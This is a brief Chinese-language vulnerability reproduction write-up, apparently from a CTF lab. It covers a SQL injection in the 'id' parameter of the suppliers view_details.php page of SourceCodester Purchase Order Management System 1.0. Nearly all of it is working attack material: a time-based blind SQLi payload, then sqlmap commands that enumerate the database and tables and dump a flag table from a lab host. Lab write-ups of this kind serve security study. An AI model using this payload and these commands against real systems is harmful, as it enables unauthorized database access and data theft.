漏洞简介

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

漏洞复现

Poc:

/admin/suppliers/view_details.php?id=1' AND (SELECT 9753 FROM (SELECT(SLEEP(5)))byoK) AND 'cyXd'='cyXd

Exp:

sqlmap一把梭。

爆库:

sqlmap -u http://eci-2zegp231xhs69bo4nt9e.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 --current-db --batch

爆表:

sqlmap -u http://eci-2zegp231xhs69bo4nt9e.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -D purchase_order_db --tables --batch

爆数据:

sqlmap -u http://eci-2zegp231xhs69bo4nt9e.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -D purchase_order_db -T fllllaaaag --dump --batch